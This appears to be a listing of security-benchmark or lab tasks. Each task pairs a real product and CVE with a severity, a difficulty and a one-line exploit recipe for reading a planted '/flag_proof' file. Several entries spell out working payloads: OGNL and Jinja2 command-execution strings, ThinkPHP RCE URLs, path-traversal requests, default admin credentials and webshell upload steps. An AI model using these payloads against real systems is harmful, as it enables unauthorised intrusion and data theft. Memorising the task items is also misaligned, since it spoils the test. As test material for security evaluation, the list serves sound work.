Spring Cloud Gateway SSRF/RCE via Actuator API. Add malicious route via POST /actuator/gateway/routes with AddResponseHeader filter containing SpEL expression for RCE.
Spring Cloud Function
CVE-2022-22963
spring/CVE-2022-22963
CVSS 9.8
EASY
RCE
file
Spring Cloud Function SpEL injection via spring.cloud.function.routing-expression header. Send crafted HTTP request with SpEL in header to execute OS commands.
Spring
CVE-2022-22965
spring/CVE-2022-22965
CVSS 9.8
MEDIUM
RCE
file
Spring4Shell: RCE via data binding on class.module.classLoader. Bind ClassLoader properties to modify Tomcat log settings and write JSP webshell to server.
Apache Struts2
–
struts2/s2-001
CVSS 9.8
EASY
RCE
file
Struts2 OGNL injection in error message via %{expr} in form field. Submit %{@java.lang.Runtime@getRuntime().exec('cat /flag_proof')} in username field for RCE.
Apache Struts2
CVE-2010-1870
struts2/s2-005
CVSS 9.8
EASY
RCE
file
Struts2 OGNL remote code execution via parameters interceptor. Inject (#_memberAccess['allowStaticMethodAccess']=true)(exec command) in HTTP parameters.
Apache Struts2
–
struts2/s2-007
CVSS 9.8
MEDIUM
RCE
file
Struts2 OGNL injection via invalid conversion. Trigger type conversion error with OGNL expression in parameter value to execute arbitrary Java code.
Apache Struts2
CVE-2012-0391
struts2/s2-008
CVSS 9.8
MEDIUM
RCE
π
file
Struts2 devMode RCE via OGNL debug parameter. Access debug=command&expression=<ognl> parameter in devMode to execute arbitrary expressions.
Apache Struts2
CVE-2011-3923
struts2/s2-009
CVSS 9.8
MEDIUM
RCE
π
file
Struts2 OGNL bypass via action chain. Use ognl.OgnlContext#DEFAULT_MEMBER_ACCESS to bypass security manager and execute OS commands via Java runtime.
Apache Struts2
CVE-2013-1965
struts2/s2-012
CVSS 9.8
MEDIUM
RCE
π
file
Struts2 redirect action RCE via OGNL in redirect URL. Inject OGNL expression in redirect:${expression} action result URL for code execution.
Apache Struts2
CVE-2013-1966
struts2/s2-013
CVSS 9.8
MEDIUM
RCE
π
file
Struts2 includeParams OGNL injection via URL/anchor tags. Inject OGNL via ${expr} in action attribute of s:url or s:a tags with includeParams=all.
Apache Struts2
CVE-2013-2134, CVE-2013-2135
struts2/s2-015
CVSS 9.8
MEDIUM
RCE
π
file
Struts2 wildcard result OGNL injection. Map wildcard action to OGNL expression in result name; trigger via URL containing crafted OGNL payload in path.
Apache Struts2
CVE-2013-2251
struts2/s2-016
CVSS 9.8
MEDIUM
RCE
π
file
Struts2 action prefix OGNL injection via redirect: prefix. Append redirect:${#context['xwork.MethodAccessor.denyMethodExecution']=false,...} to URL for RCE.
Apache Struts2
CVE-2016-3081
struts2/s2-032
CVSS 9.8
HARD
RCE
π
file
Struts2 Dynamic Method Invocation RCE via method prefix. Use method:OGNL_EXPR to invoke arbitrary methods when DMI is enabled in struts.xml.
Apache Struts2
CVE-2017-5638
struts2/s2-045
CVSS 10.0
EASY
RCE
π
file
Struts2 Jakarta multipart parser RCE via Content-Type header OGNL. Send multipart POST with OGNL expression in Content-Type header for unauthenticated RCE.
Apache Struts2
CVE-2017-5638
struts2/s2-046
CVSS 10.0
EASY
RCE
π
file
Struts2 Content-Disposition OGNL injection similar to S2-045. Inject OGNL in filename field of multipart upload Content-Disposition header for RCE.
Apache Struts2
CVE-2017-9791
struts2/s2-048
CVSS 9.3
MEDIUM
RCE
π
file
Struts2 Struts 1 plugin OGNL injection via ActionMessage. Inject OGNL in message parameter of Struts 1 integration plugin for remote code execution.
Apache Struts2
CVE-2017-9805
struts2/s2-052
CVSS 9.8
HARD
RCE
π
file
Struts2 REST plugin XStream deserialization RCE. Send crafted XML payload to REST endpoint with Content-Type: application/xml to trigger XStream deserialization.
Apache Struts2
CVE-2017-12611
struts2/s2-053
CVSS 9.8
HARD
RCE
π
file
Struts2 Freemarker tag OGNL injection via FreeMarker templates. Inject OGNL expression in Freemarker template attribute ${(#_memberAccess...) } for code execution.
Apache Struts2
CVE-2018-11776
struts2/s2-057
CVSS 9.8
HARD
RCE
π
file
Struts2 namespace OGNL injection when namespace is not set and action is empty string. Inject OGNL via namespace in URL for RCE without prior authentication.
Apache Struts2
CVE-2019-0230
struts2/s2-059
CVSS 9.8
HARD
RCE
π
file
Struts2 OGNL injection via id attribute in UI tags. Inject OGNL expression in id attribute of s:url tag when evaluated as OGNL expression due to forced evaluation.
Apache Struts2
CVE-2020-17530
struts2/s2-061
CVSS 9.8
HARD
RCE
π
file
Struts2 OGNL sandbox bypass (S2-061). Use (#context=#attr['struts.valueStack'].context) bypass chain to escape OGNL sandbox and execute OS commands.
Apache Superset
CVE-2023-37941
superset/CVE-2023-37941
CVSS 9.8
HARD
RCE
π
file
Apache Superset RCE via Pickle deserialization in Celery task metadata. Craft malicious pickled object in task parameters to execute OS commands on Superset server.
Supervisor
CVE-2017-11610
supervisor/CVE-2017-11610
CVSS 9.8
EASY
RCE
π
file
Supervisor XML-RPC interface RCE via supervisord API. Call supervisor.supervisord.options.warnings.os.system('cmd') on exposed XML-RPC port 9001 without auth.
TeamCity
CVE-2023-42793
teamcity/CVE-2023-42793
CVSS 9.8
EASY
RCE
π
file
TeamCity authentication bypass via exposed REST API endpoints. Access /app/rest/users/id:1/tokens to create API token without authentication, then use token for RCE.
ThinkPHP
β
thinkphp/2-rce
CVSS 9.8
EASY
RCE
π
file
ThinkPHP 2.x RCE via URL routing code evaluation. Access /?s=index/think\app/invokefunction&function=system&vars[]=id to execute OS commands directly.
ThinkPHP
β
thinkphp/5-rce
CVSS 9.8
EASY
RCE
π
file
ThinkPHP 5.x RCE via _method parameter override. POST _method=__construct&filter[]=system&method=GET&server[REQUEST_METHOD]=id to execute commands.
ThinkPHP
β
thinkphp/5.0.23-rce
CVSS 9.8
EASY
RCE
π
file
ThinkPHP 5.0.23 RCE via request method override. Exploit method=__construct to manipulate filter chain and execute system commands through controller invocation.
Apache Tomcat
CVE-2025-24813
tomcat/CVE-2025-24813
CVSS 9.8
HARD
RCE
π
file
Apache Tomcat partial PUT session deserialization RCE. Upload serialized Java payload via partial PUT request, trigger deserialization via session lookup for RCE.
Apache Unomi
CVE-2020-13942
unomi/CVE-2020-13942
CVSS 9.8
EASY
RCE
π
file
Apache Unomi MVEL/OGNL injection via crafted event payload. POST to /context.json with MVEL expression in condition script for unauthenticated RCE on CDP server.
WebLogic
CVE-2017-10271
weblogic/CVE-2017-10271
CVSS 9.8
EASY
RCE
π
file
Oracle WebLogic WLS-WebServices component deserialization RCE. POST crafted XMLDecoder payload to /wls-wsat/CoordinatorPortType11 for unauthenticated RCE.
WebLogic
CVE-2018-2628
weblogic/CVE-2018-2628
CVSS 9.8
MEDIUM
RCE
π
file
Oracle WebLogic T3 protocol deserialization RCE. Send crafted T3 handshake with malicious serialized Java object to port 7001 to execute OS commands.
WebLogic
CVE-2020-14882
weblogic/CVE-2020-14882
CVSS 9.8
EASY
RCE
π
file
Oracle WebLogic Console authentication bypass via URL override. Access /console/css/%252e%252e%252fconsole.portal to bypass authentication and access admin functions.
WebLogic
CVE-2023-21839
weblogic/CVE-2023-21839
CVSS 7.5
MEDIUM
RCE
π
file
Oracle WebLogic LDAP injection via OracleTextConnection. Bind malicious JNDI/LDAP URL to trigger LDAP lookup and achieve SSRF or remote class loading.
WebLogic
β
weblogic/weak_password
CVSS 9.8
EASY
RCE
π
file
WebLogic console accessible with default credentials (weblogic:weblogic1 or weblogic:Oracle@123). Login to /console, deploy malicious WAR to achieve RCE.
Webmin
CVE-2019-15107
webmin/CVE-2019-15107
CVSS 10.0
EASY
RCE
π
file
Webmin 1.920 pre-auth RCE via password_change.cgi exploit. Send crafted POST with pipe metacharacters in old password field to execute OS commands without authentication.
WordPress
β
wordpress/pwnscriptum
CVSS 9.8
HARD
RCE
π
file
WordPress + PHPMailer RCE via crafted email in registration. Register with malicious email containing shell metacharacters that get passed to sendmail for command execution.
XStream
CVE-2021-21351
xstream/CVE-2021-21351
CVSS 9.8
HARD
RCE
π
file
XStream deserialization RCE via Groovy closure. Craft XML payload using com.thoughtworks.xstream.converters.collections.TreeMapConverter to execute Groovy scripts.
XStream
CVE-2021-29505
xstream/CVE-2021-29505
CVSS 9.8
HARD
RCE
π
file
XStream server-side forgery via JMX invocation. Deserialize crafted XStream XML that triggers JMX MBean invocation to execute OS commands on server.
YApi
β
yapi/unacc
CVSS 9.8
EASY
RCE
π
file
YApi unauthenticated access and RCE via mock scripts. Register account, create project, add mock script with require('child_process').execSync('cmd') for RCE.
Zabbix
CVE-2017-2824
zabbix/CVE-2017-2824
CVSS 9.8
MEDIUM
RCE
π
file
Zabbix trapper command injection via active agent registration. Send crafted auto-registration request to Zabbix server trapper port 10051 to execute OS commands.
Zabbix
CVE-2020-11800
zabbix/CVE-2020-11800
CVSS 9.8
HARD
RCE
π
file
Zabbix active agent trapper integer overflow RCE. Send crafted active check response to Zabbix server trapper to trigger buffer overflow and execute shellcode.
Apache ActiveMQ
CVE-2015-5254
activemq/CVE-2015-5254
CVSS 7.5
MEDIUM
DESERIALIZATION
π
file
Send crafted JMS ObjectMessage to ActiveMQ broker containing Commons-Collections gadget chain. Broker deserializes unauthenticated payload and executes OS command.
Celery
β
celery/celery3_redis_unauth
CVSS 9.8
EASY
DESERIALIZATION
π
file
Unauthenticated Redis broker used by Celery allows injecting arbitrary serialized task payloads. Celery worker deserializes and executes the malicious task.
Adobe ColdFusion
CVE-2017-3066
coldfusion/CVE-2017-3066
CVSS 10.0
HARD
DESERIALIZATION
π
file
Java deserialization via ColdFusion AMF endpoint. Send crafted AMF3 payload with gadget chain to the /flex2gateway/amf endpoint for unauthenticated RCE.
Apache Dubbo
CVE-2019-17564
dubbo/CVE-2019-17564
CVSS 9.8
HARD
DESERIALIZATION
π
file
Java deserialization in Apache Dubbo HTTP provider via crafted POST to exposed HTTP endpoint. Commons-Collections gadget chain executes OS commands.
Joomla
CVE-2015-8562
joomla/CVE-2015-8562
CVSS 7.5
MEDIUM
DESERIALIZATION
π
file
PHP object injection via HTTP User-Agent/X-Forwarded-For in Joomla session handler. Craft serialized PHP payload to execute OS commands.
Mojarra JSF
β
mojarra/jsf-viewstate-deserialization
CVSS 9.8
HARD
DESERIALIZATION
π
file
Apache Mojarra JSF ViewState Java deserialization. Craft malicious serialized ViewState payload using ysoserial to execute OS commands and read flag.
Neo4j
CVE-2021-34371
neo4j/CVE-2021-34371
CVSS 9.8
HARD
DESERIALIZATION
π
file
Neo4j 3.4 RMI deserialization via exposed RMI registry. Send crafted serialized payload to port 7474 RMI service using ysoserial CommonsCollections gadget.
Apache OFBiz
CVE-2023-49070
ofbiz/CVE-2023-49070
CVSS 9.8
HARD
DESERIALIZATION
π
file
Apache OFBiz authentication bypass via Groovy script execution. Access /webtools/control/ProgramExport without auth to execute Groovy code and read flag file.
phpMyAdmin
β
phpmyadmin/WooYun-2016-199433
CVSS 9.8
MEDIUM
DESERIALIZATION
π₯
db
phpMyAdmin SQL injection via parameter in setup.php. Inject into database parameter to extract mysql credentials from information_schema.
1panel
CVE-2024-39907
1panel/CVE-2024-39907
CVSS 9.8
HARD
SQLI
π
file
SQL injection in 1Panel Linux panel allows unauthenticated RCE. Craft malicious SQL payload to write webshell via outfile, then execute commands.
Cacti
CVE-2023-39361, CVE-2024-31459
cacti/CVE-2023-39361
CVSS 9.8
HARD
SQLI
π
file
SQL injection in Cacti graph_view.php leads to RCE via stacked queries writing a PHP webshell to the web root.
CMS Made Simple
CVE-2019-9053
cmsms/CVE-2019-9053
CVSS 9.8
MEDIUM
SQLI
π₯
db
SQL injection in CMS Made Simple search module. Time-based blind injection via m1_idlist parameter extracts admin credentials.
Django
CVE-2019-14234
django/CVE-2019-14234
CVSS 9.8
HARD
SQLI
π₯
db
SQLi via JSONField key transform lookups. Parameter names not properly quoted allowing SQL injection through crafted ORM filter expressions.
Django
CVE-2020-9402
django/CVE-2020-9402
CVSS 8.8
MEDIUM
SQLI
π₯
db
SQLi in Django GIS database functions. Craft malicious geometry to inject SQL via GEOSGeomFromWKB and extract database contents.
Django
CVE-2021-35042
django/CVE-2021-35042
CVSS 9.8
HARD
SQLI
π₯
db
Inject SQL via QuerySet.order_by() annotation with user-controlled input. Bypasses Django ORM escaping to execute arbitrary SQL.
Django
CVE-2022-34265
django/CVE-2022-34265
CVSS 9.8
HARD
SQLI
π₯
db
SQLi via Trunc()/Extract() when user-controlled kind parameter flows without validation. Bypasses Django ORM quoting mechanism.
Drupal
CVE-2014-3704
drupal/CVE-2014-3704
CVSS 7.5
EASY
SQLI
π₯
db
SQL injection via array parameter in Drupal DB API without authentication. Extract admin password hash from users table.
ECShop
β
ecshop/collection_list-sqli
CVSS 9.8
EASY
SQLI
π₯
db
SQL injection in ECShop collection_list.php via id parameter. Extract admin credentials from database without authentication.
ECShop
β
ecshop/xianzhi-2017-02-82239600
CVSS 9.8
MEDIUM
SQLI
π
file
Remote code execution in ECShop via template injection in ECSHOP_USER_INFO cookie. Inject PHP code that gets evaluated in template rendering.
GeoServer
CVE-2023-25157
geoserver/CVE-2023-25157
CVSS 9.8
HARD
SQLI
π₯
db
SQL injection in GeoServer OGC filter property name. Craft property containing SQL payload to execute arbitrary SQL against the spatial database backend.
Joomla
CVE-2017-8917
joomla/CVE-2017-8917
CVSS 9.8
MEDIUM
SQLI
π₯
db
SQL injection in Joomla com_fields via list[fullordering] parameter. No auth required. UNION-based extraction of admin credentials.
Magento
β
magento/2.2-sqli
CVSS 7.5
HARD
SQLI
π₯
db
Blind SQL injection in Magento REST API product filter parameter. No auth required. Time-based injection extracts admin password hash.
MeterSphere
CVE-2021-45788
metersphere/CVE-2021-45788
CVSS 9.8
HARD
SQLI
π
file
Remote code execution in MeterSphere via Freemarker template injection in test script. Inject template directives to execute OS commands and read flag.
Rocket.Chat
CVE-2021-22911
rocketchat/CVE-2021-22911
CVSS 9.8
HARD
SQLI
π
file
Rocket.Chat NoSQL injection in password reset allows admin account takeover. Inject {$gt: ''} in token field to bypass password reset validation and reset admin password.
ShowDoc
β
showdoc/3.2.5-sqli
CVSS 7.5
MEDIUM
SQLI
π₯
db
SQL injection in ShowDoc 3.2.5 via item_id parameter. Inject UNION SELECT payload to extract admin credentials from the members table.
Apache SkyWalking
β
skywalking/8.3.0-sqli
CVSS 9.8
HARD
SQLI
π₯
db
Apache SkyWalking GraphQL SQL injection. Inject malicious GraphQL query via /graphql endpoint to extract data from H2 database used by SkyWalking OAP server.
ThinkPHP
β
thinkphp/in-sqlinjection
CVSS 9.8
MEDIUM
SQLI
π₯
db
ThinkPHP SQL injection via IN operator array parameter. Inject array payload in where conditions to perform blind SQL injection and extract database contents.
YApi
β
yapi/mongodb-inj
CVSS 9.8
HARD
SQLI
π₯
db
YApi MongoDB injection via mock script. Inject MongoDB operator in JSON schema mock to extract user data from MongoDB without authentication.
Zabbix
CVE-2016-10134
zabbix/CVE-2016-10134
CVSS 9.8
EASY
SQLI
π₯
db
Zabbix SQL injection in latest.php via toggle_ids parameter. Inject UNION SELECT to extract admin session tokens and MD5 passwords from Zabbix database.
Adminer
CVE-2021-21311
adminer/CVE-2021-21311
CVSS 9.8
MEDIUM
SSRF
π
file
Open redirect in Adminer allows phishing via crafted server parameter. Combine with SSRF to probe internal services and extract credentials.
Apache CXF
CVE-2024-28752
apache-cxf/CVE-2024-28752
CVSS 7.5
MEDIUM
SSRF
π
file
SSRF in Apache CXF MTOM attachment processing allows server-side request to internal services via crafted multipart message.
GeoServer
CVE-2021-40822
geoserver/CVE-2021-40822
CVSS 7.5
EASY
SSRF
π₯
service
SSRF in GeoServer OWS API via crafted service URL. Server fetches attacker-specified URL enabling internal network scanning.
Grafana
β
grafana/admin-ssrf
CVSS 7.5
EASY
SSRF
π₯
service
Exploit Grafana datasource proxy without auth to perform SSRF. Reach internal flag_validator or admin-only metadata endpoints.
Apache HTTP Server
CVE-2021-40438
httpd/CVE-2021-40438
CVSS 9.0
MEDIUM
SSRF
π₯
service
mod_proxy SSRF: craft request with unix:// or http:// URI targeting internal backend to bypass origin restrictions and reach internal services.
WebLogic
β
weblogic/ssrf
CVSS 7.5
MEDIUM
SSRF
π₯
env
WebLogic UDDI registry SSRF via crafted SOAP request. Send SOAP to /uddiexplorer/SearchPublicRegistries.jsp to probe internal services and extract credentials.
PHP
β
php/php_xxe
CVSS 7.5
MEDIUM
XXE
π
file
PHP XXE via SimpleXML parsing of user-supplied XML. Inject external entity declaration to read /flag_proof from server filesystem via XML parsing.
Apache Solr
CVE-2017-12629
solr/CVE-2017-12629-XXE
CVSS 7.5
EASY
XXE
π
file
Apache Solr XXE in XML query parsing. Send crafted XML query with external entity to /solr/collection/select to read /flag_proof from server filesystem.
Apache Airflow
CVE-2020-17526
airflow/CVE-2020-17526
CVSS 7.5
EASY
AUTH BYPASS
π
file
Bypass Airflow authentication via JWT secret misconfiguration or default secret to forge admin session and access DAGs.
AppWeb
CVE-2018-8715
appweb/CVE-2018-8715
CVSS 7.5
EASY
AUTH BYPASS
π
file
Bypass HTTP digest authentication in Appweb by omitting Authorization header on digest-only routes. Access admin endpoints without credentials.
Budibase
CVE-2026-31816
budibase/CVE-2026-31816
CVSS 9.8
MEDIUM
AUTH BYPASS
π
file
Authentication bypass in Budibase via forged JWT or API key exposure allows admin access and server-side JS execution for RCE.
Confluence
CVE-2023-22515
confluence/CVE-2023-22515
CVSS 10.0
HARD
AUTH BYPASS
π
file
Broken access control allows unauthenticated POST to /setup/setupadministrator.action. Create admin account then use console for RCE via template injection.
Apache CouchDB
CVE-2017-12635
couchdb/CVE-2017-12635
CVSS 9.8
EASY
AUTH BYPASS
π₯
db
CouchDB JSON/Erlang parser inconsistency: PUT user doc with duplicate 'roles' key creates admin unauthenticated. Exploit role escalation.
Gogs
CVE-2018-18925
gogs/CVE-2018-18925
CVSS 9.8
MEDIUM
AUTH BYPASS
π
file
Forge Gogs remember-me cookie using known user ID. Craft signed cookie to authenticate as admin. Chain with Git hooks for arbitrary command execution.
Apache HugeGraph
CVE-2024-43441
hugegraph/CVE-2024-43441
CVSS 9.8
EASY
AUTH BYPASS
π
file
Authentication bypass in HugeGraph REST API. Unauthenticated access to admin endpoints allows user creation and Gremlin RCE via API.
GNU InetUtils
CVE-2026-24061
inetutils/CVE-2026-24061
CVSS 9.8
MEDIUM
AUTH BYPASS
π
file
Buffer overflow or auth bypass in inetutils ftpd/telnetd. Exploit to gain unauthenticated shell access and read /flag_proof.
InfluxDB
CVE-2019-20933
influxdb/CVE-2019-20933
CVSS 9.8
MEDIUM
AUTH BYPASS
π₯
db
InfluxDB accepts JWT signed with empty secret. Craft valid JWT with empty secret and any username to gain admin access to all databases.
Joomla
CVE-2023-23752
joomla/CVE-2023-23752
CVSS 7.5
EASY
AUTH BYPASS
π₯
db
Improper access check on Joomla REST API returns database credentials in plaintext to unauthenticated requests.
JumpServer
CVE-2023-42820
jumpserver/CVE-2023-42820
CVSS 9.8
MEDIUM
AUTH BYPASS
π
file
Authentication bypass in JumpServer via forged JWT or HMAC bypass. Access admin endpoints to create new privileged sessions or execute commands.
Jupyter
β
jupyter/notebook-rce
CVSS 10.0
EASY
AUTH BYPASS
π
file
Unauthenticated Jupyter Notebook server. Create notebook, execute Python cell: open('/flag_proof').read() or subprocess.check_output(['cat','/flag_proof']).
LibSSH
CVE-2018-10933
libssh/CVE-2018-10933
CVSS 9.8
EASY
AUTH BYPASS
π
file
Authentication bypass in libssh server: send SSH2_MSG_USERAUTH_SUCCESS before authentication request. Server accepts connection as authenticated.
MySQL
CVE-2012-2122
mysql/CVE-2012-2122
CVSS 7.8
MEDIUM
AUTH BYPASS
π₯
db
MySQL authentication bypass via timing attack on password comparison. Repeatedly attempt login with any password; ~1 in 256 attempts succeeds due to memcmp bug.
Nacos
CVE-2021-29441
nacos/CVE-2021-29441
CVSS 9.8
EASY
AUTH BYPASS
π
file
Nacos authentication bypass via User-Agent: Nacos-Server header. Access protected /nacos/v1/auth/users endpoint to add admin user, then exploit further to get RCE.
Next.js
CVE-2025-29927
next.js/CVE-2025-29927
CVSS 9.8
INSANE
AUTH BYPASS
π
file
Next.js middleware auth bypass via x-middleware-subrequest header. Set header to skip middleware execution and access protected routes without authentication.
ntopng
CVE-2021-28073
ntopng/CVE-2021-28073
CVSS 9.8
MEDIUM
AUTH BYPASS
π
file
ntopng authentication bypass via password reset without old password verification. Reset admin password directly via API without authentication token.
Openfire
CVE-2023-32315
openfire/CVE-2023-32315
CVSS 9.8
EASY
AUTH BYPASS
π
file
Openfire path traversal in admin console allows unauthenticated access. Navigate to setup-completed bypassed pages to create admin account and achieve RCE via plugin upload.
rsync
β
rsync/common
CVSS 9.8
EASY
AUTH BYPASS
π
file
rsync daemon unauthenticated access to exposed modules. Connect with rsync --list-only rsync://target/ to discover modules, then rsync rsync://target/module/ to download all files including flag.
Scrapyd
β
scrapy/scrapyd-unacc
CVSS 9.8
EASY
AUTH BYPASS
π
file
Scrapyd unauthenticated access to management API. Deploy malicious Scrapy spider via POST /schedule.json to execute Python code on the server and read flag.
Apache Shiro
CVE-2010-3863
shiro/CVE-2010-3863
CVSS 7.5
EASY
AUTH BYPASS
π
file
Apache Shiro authentication bypass via path normalization. Add semicolon or dot-slash to bypass Shiro URL pattern matching: /admin;/index to access protected resources.
Apache Shiro
CVE-2020-1957
shiro/CVE-2020-1957
CVSS 7.5
MEDIUM
AUTH BYPASS
π
file
Apache Shiro authentication bypass via Spring MVC pattern mismatch. Access /admin/ vs Shiro's /admin pattern matching difference to bypass authentication.
Spring
CVE-2022-22978
spring/CVE-2022-22978
CVSS 9.8
HARD
AUTH BYPASS
π
file
Spring Security RegexRequestMatcher auth bypass via regex edge cases. URL-encode characters to bypass regex pattern matching and access protected endpoints.
Apache Superset
CVE-2023-27524
superset/CVE-2023-27524
CVSS 9.8
MEDIUM
AUTH BYPASS
π
file
Apache Superset default SECRET_KEY allows session forgery. If using default SECRET_KEY (thisismysecretkey), forge admin Flask session cookie to access dashboard.
TeamCity
CVE-2024-27198
teamcity/CVE-2024-27198
CVSS 10.0
MEDIUM
AUTH BYPASS
π
file
TeamCity auth bypass via alternative path (/app/rest with jsessionId bypass). Combine with RCE via admin user creation to execute OS commands on build server.
Tiki Wiki
CVE-2020-15906
tikiwiki/CVE-2020-15906
CVSS 9.8
EASY
AUTH BYPASS
π
file
TikiWiki authentication bypass via empty password. In older versions, admin account with empty password hash allows login with any password; brute force admin panel.
Apache Tomcat
CVE-2020-1938
tomcat/CVE-2020-1938
CVSS 9.8
MEDIUM
AUTH BYPASS
π
file
Ghostcat: Apache JServ Protocol (AJP) file read/inclusion. Connect to AJP port 8009, request any file path to read including WEB-INF/web.xml and JSP execution.
Apache Tomcat
β
tomcat/tomcat8
CVSS 9.8
MEDIUM
AUTH BYPASS
π
file
Apache Tomcat manager application with default credentials (tomcat:tomcat). Login to /manager/html, deploy malicious WAR file containing JSP webshell for RCE.
uWSGI
β
uwsgi/unacc
CVSS 9.8
EASY
AUTH BYPASS
π
file
uWSGI stats server unauthenticated access on port 1717. Connect to stats socket, enumerate workers, and exploit uWSGI magic variables to execute OS commands.
XXL-JOB
β
xxl-job/unacc
CVSS 9.8
EASY
AUTH BYPASS
π
file
XXL-JOB executor unauthenticated access on port 9999. POST to /run endpoint with malicious GLUE script (Java) or BEAN handler to execute arbitrary code.
Apache ActiveMQ
CVE-2016-3088
activemq/CVE-2016-3088
CVSS 9.8
MEDIUM
COMMAND INJECTION
π
file
Upload JSP webshell via HTTP PUT to ActiveMQ fileserver, then HTTP MOVE it into the admin web directory. Trigger execution via GET.
Aria2
β
aria2/rce
CVSS 9.8
EASY
COMMAND INJECTION
π
file
Unauthenticated RPC access to aria2c daemon allows adding download tasks with out-of-path file names to write arbitrary files (e.g. SSH authorized_keys).
CGI
CVE-2016-5385
cgi/CVE-2016-5385
CVSS 8.1
MEDIUM
COMMAND INJECTION
π
file
HTTP_PROXY env var injection via Proxy header in CGI scripts (HTTPoxy). Causes outbound requests to go through attacker-controlled proxy revealing internal traffic.
Drupal
CVE-2019-6341
drupal/CVE-2019-6341
CVSS 8.8
MEDIUM
COMMAND INJECTION
π
file
Open redirect via crafted file URL in Drupal. Chain with XSS to steal admin session or redirect to attacker-controlled site for credential harvesting.
ElasticSearch
β
elasticsearch/WooYun-2015-110216
CVSS 9.8
MEDIUM
COMMAND INJECTION
π
file
Groovy/MVEL RCE via Elasticsearch dynamic script execution. Unauthenticated search query with script that invokes Runtime.exec() for OS command execution.
n8n
CVE-2025-68613
n8n/CVE-2025-68613
CVSS 9.8
HARD
COMMAND INJECTION
π
file
Server-side request forgery and RCE in n8n workflow automation via malicious webhook node. Craft workflow that executes arbitrary commands via HTTP Request node with file:// scheme.
Apache RocketMQ
CVE-2023-37582
rocketmq/CVE-2023-37582
CVSS 9.8
HARD
COMMAND INJECTION
π
file
Apache RocketMQ NameServer RCE via unauthorized config update. Bypass authentication to update filterServerNums config and trigger remote command execution.
SaltStack
CVE-2020-11652
saltstack/CVE-2020-11652
CVSS 7.5
EASY
COMMAND INJECTION
π
file
SaltStack directory traversal in wheel module allows reading arbitrary files. Use wheel.fs.file.read with path traversal to read /etc/shadow or /flag_proof files.
Apache Tomcat
CVE-2017-12615
tomcat/CVE-2017-12615
CVSS 9.8
EASY
COMMAND INJECTION
π
file
Apache Tomcat arbitrary file upload via PUT method when readonly=false. PUT /webshell.jsp/ with JSP payload to deploy webshell and execute OS commands.
WebLogic
CVE-2018-2894
weblogic/CVE-2018-2894
CVSS 9.8
MEDIUM
COMMAND INJECTION
π
file
Oracle WebLogic arbitrary file upload via development console. Upload JSP webshell through /ws_utc/begin.do endpoint when dev console is enabled on port 7001.
Jinja2
β
flask/ssti
CVSS 8.1
MEDIUM
SSTI
π
file
Server-Side Template Injection in Flask/Jinja2. Inject {{config.__class__.__init__.__globals__['os'].popen('cat /flag_proof').read()}} in vulnerable template parameter.
Jira
CVE-2019-11581
jira/CVE-2019-11581
CVSS 9.8
HARD
SSTI
π₯
service
SSRF in Jira ContactAdministrators action. Inject FreeMarker template in email subject for RCE, or use SSRF to reach internal-only services.
Adminer
CVE-2021-43008
adminer/CVE-2021-43008
CVSS 9.8
HARD
PATH TRAVERSAL
π₯
db
Adminer 4.6.2 file disclosure via SSRF to local MySQL. Connect to attacker-controlled MySQL server to read arbitrary files from the target.
Adobe ColdFusion
CVE-2010-2861
coldfusion/CVE-2010-2861
CVSS 7.5
EASY
PATH TRAVERSAL
π
file
Directory traversal via locale parameter in ColdFusion admin. Request /CFIDE/administrator/enter.cfm?locale=../../flag_proof to read arbitrary files.
ElasticSearch
CVE-2015-3337
elasticsearch/CVE-2015-3337
CVSS 4.0
EASY
PATH TRAVERSAL
π
file
Path traversal in Elasticsearch site plugin via /_plugin/<name>/../../../etc/passwd. Read arbitrary files from server without authentication.
ElasticSearch
CVE-2015-5531
elasticsearch/CVE-2015-5531
CVSS 5.0
EASY
PATH TRAVERSAL
π
file
Directory traversal in Elasticsearch snapshot API via crafted repository path. Read arbitrary files from the Elasticsearch server filesystem.
FFmpeg
CVE-2016-1897, CVE-2016-1898
ffmpeg/CVE-2016-1897
CVSS 5.9
MEDIUM
PATH TRAVERSAL
π
file
SSRF via crafted HLS playlist in FFmpeg. Attacker-controlled m3u8 playlist with file:// or http:// URLs causes FFmpeg to fetch and embed internal file contents.
FFmpeg
CVE-2017-9993
ffmpeg/CVE-2017-9993
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
Unsafe use of concat demuxer in FFmpeg allows reading local files via crafted playlist when processing untrusted video files.
Apache Flink
CVE-2020-17518
flink/CVE-2020-17518
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
Upload arbitrary file via Flink REST API with path traversal in filename parameter to write outside designated upload directory. Chain with JAR execution for RCE.
Apache Flink
CVE-2020-17519
flink/CVE-2020-17519
CVSS 7.5
EASY
PATH TRAVERSAL
π
file
Unauthenticated path traversal via Flink REST: GET /jobmanager/logs/..%252F..%252F..%252Fflag_proof reads arbitrary files from JobManager filesystem.
GitLab
CVE-2016-9086
gitlab/CVE-2016-9086
CVSS 6.5
MEDIUM
PATH TRAVERSAL
π
file
Path traversal in GitLab API export feature. Authenticated user downloads repository export with path traversal to read files outside the export directory.
GlassFish
CVE-2017-1000028
glassfish/CVE-2017-1000028
CVSS 7.5
EASY
PATH TRAVERSAL
π
file
GlassFish 4.x path traversal via /../ sequences in URL allows reading arbitrary files. Navigate to /theme/META-INF/../../../flag_proof to extract flag.
Gradio
CVE-2023-51449
gradio/CVE-2023-51449
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
Path traversal in Gradio file serving endpoint. Request /file=../../../flag_proof to read arbitrary files from server without authentication.
Gradio
CVE-2024-1561
gradio/CVE-2024-1561
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
Unauthenticated file read in Gradio via absolute path traversal in /file= endpoint. Access any file readable by the Gradio process.
Grafana
CVE-2021-43798
grafana/CVE-2021-43798
CVSS 7.5
EASY
PATH TRAVERSAL
π
file
Path traversal: GET /public/plugins/<plugin>/../../../etc/flag_proof. No authentication. Read any file accessible by grafana process.
Apache HTTP Server
CVE-2021-41773
httpd/CVE-2021-41773
CVSS 7.5
EASY
PATH TRAVERSAL
π
file
Path traversal via %2e%2e URL encoding in Apache 2.4.49. GET /cgi-bin/.%2e/.%2e/.%2e/flag_proof. Enable mod_cgi for RCE.
Apache HTTP Server
CVE-2021-42013
httpd/CVE-2021-42013
CVSS 9.8
EASY
PATH TRAVERSAL
π
file
Bypass CVE-2021-41773 patch via double encoding (%%32%65%%32%65) to traverse outside docroot. Execute OS commands with mod_cgi enabled.
ImageMagick
CVE-2022-44268
imagemagick/CVE-2022-44268
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
